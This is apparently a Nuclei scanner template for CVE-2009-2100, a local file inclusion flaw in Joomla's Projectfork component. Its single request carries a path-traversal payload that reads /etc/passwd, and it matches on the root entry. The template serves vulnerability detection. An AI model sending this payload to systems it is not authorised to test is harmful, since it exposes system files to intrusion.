41 lines
1.4 KiB
YAML
41 lines
1.4 KiB
YAML
id: CVE-2009-2100
|
|
|
|
info:
|
|
name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
|
|
remediation: |
|
|
Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/8946
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2009-2100
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2009-2100
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00528
|
|
epss-percentile: 0.7444
|
|
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: joomla
|
|
product: joomla
|
|
tags: cve,cve2009,joomla,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502204084caf300047c1fc6f678047038162fa8420846e23cbca84112156ad80b4637022100aa6ef07475f3da84e0581c5d5a7a5f69582b383a6a39ac32d0bb4ab89fe3a298:922c64590222798bb761d5b6d8e72950 |